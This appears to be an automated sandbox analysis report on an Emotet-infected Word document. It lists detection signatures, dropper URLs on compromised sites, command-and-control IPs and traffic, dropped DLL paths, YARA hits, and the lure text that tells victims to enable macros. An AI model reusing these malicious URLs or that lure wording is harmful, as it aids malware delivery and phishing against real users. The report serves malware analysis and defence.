Analysis Report Doc.doc

Overview

General Information

Sample Name:	Doc.doc
Analysis ID:	337532
MD5:	16f391d60eff19aabb43225c85d5145c
SHA1:	58becf84bea5dafb9d46afc194a4eaf946fa4c72
SHA256:	af5c3952d0c7a7a2925c6086aa050dd076afc1adead3663dc2141087009a6d87
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

AV process strings found (often used to terminate AV products)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: https://goldilockstraining.com/wp-includes/bftt/	Avira URL Cloud: Label: malware
Source: http://biglaughs.org/smallpotatoes/rRwRzc/	Avira URL Cloud: Label: malware
Source: http://paulscomputing.com/CraigsMagicSquare/H/	Avira URL Cloud: Label: malware
Source: http://goldcoastoffice365.com/temp/X/	Avira URL Cloud: Label: phishing
Source: http://goldcoastoffice365.com/temp/X/P	Avira URL Cloud: Label: phishing
Source: http://azraktours.com/wp-content/NWF9jC/	Avira URL Cloud: Label: malware
Source: http://josegene.com/theme/gU8/	Avira URL Cloud: Label: malware
Source: https://jeffdahlke.com/css/bg4n3/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: paulscomputing.com	Virustotal: Detection: 11%	Perma Link
Source: https://goldilockstraining.com/wp-includes/bftt/	Virustotal: Detection: 15%	Perma Link
Source: http://biglaughs.org/smallpotatoes/rRwRzc/	Virustotal: Detection: 16%	Perma Link
Source: http://paulscomputing.com	Virustotal: Detection: 11%	Perma Link
Source: http://paulscomputing.com/CraigsMagicSquare/H/	Virustotal: Detection: 19%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

ReversingLabs: Detection: 89%

Multi AV Scanner detection for submitted file

Source: Doc.doc	Virustotal: Detection: 69%			Perma Link
Source: Doc.doc	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002EA69B CryptDecodeObjectEx,

17_2_002EA69B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E75F0 FindFirstFileW,

17_2_002E75F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: paulscomputing.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
Source: Traffic	Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49171 -> 167.71.148.58:443

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://josegene.com/theme/gU8/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: https://jeffdahlke.com/css/bg4n3/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://goldcoastoffice365.com/temp/X/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 167.71.148.58 167.71.148.58
Source: Joe Sandbox View	IP Address: 202.187.222.40 202.187.222.40

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
Source: Joe Sandbox View	ASN Name: SHAWCA SHAWCA

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: POST /7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/ HTTP/1.1DNT: 0Referer: 167.71.148.58/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/Content-Type: multipart/form-data; boundary=-----------------------cs0BVrSncg9DYPKmcW5iNvLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7956Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E280B InternetReadFile,

17_2_002E280B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: paulscomputing.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://goldcoastoffice365.com/temp/X/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	String found in binary or memory: http://goldcoastoffice365.com/temp/X/P
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://josegene.com/theme/gU8/
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	String found in binary or memory: http://paulscomputing.com
Source: powershell.exe, 00000005.00000002.2094330849.0000000002CF2000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://jeffdahlke.com/css/bg4n3/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd"
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd" N@m 13 ;a 10096 G) FI
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Jump to dropped file

Very long command line found

Source: unknown	Process created: Commandline size = 7696
Source: unknown	Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7605	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Lkvi\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D270	7_2_1000D270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011EA7	7_2_10011EA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012750	7_2_10012750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012B5C	7_2_10012B5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001237C	7_2_1001237C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012F7C	7_2_10012F7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296C05	7_2_00296C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294121	7_2_00294121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A4DAD	7_2_002A4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AC19B	7_2_002AC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00296E8A	7_2_00296E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A533C	7_2_002A533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029FB04	7_2_0029FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00299716	7_2_00299716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0029E360	7_2_0029E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002AA7E4	7_2_002AA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002983F0	7_2_002983F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00294828	7_2_00294828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002A5060	7_2_002A5060
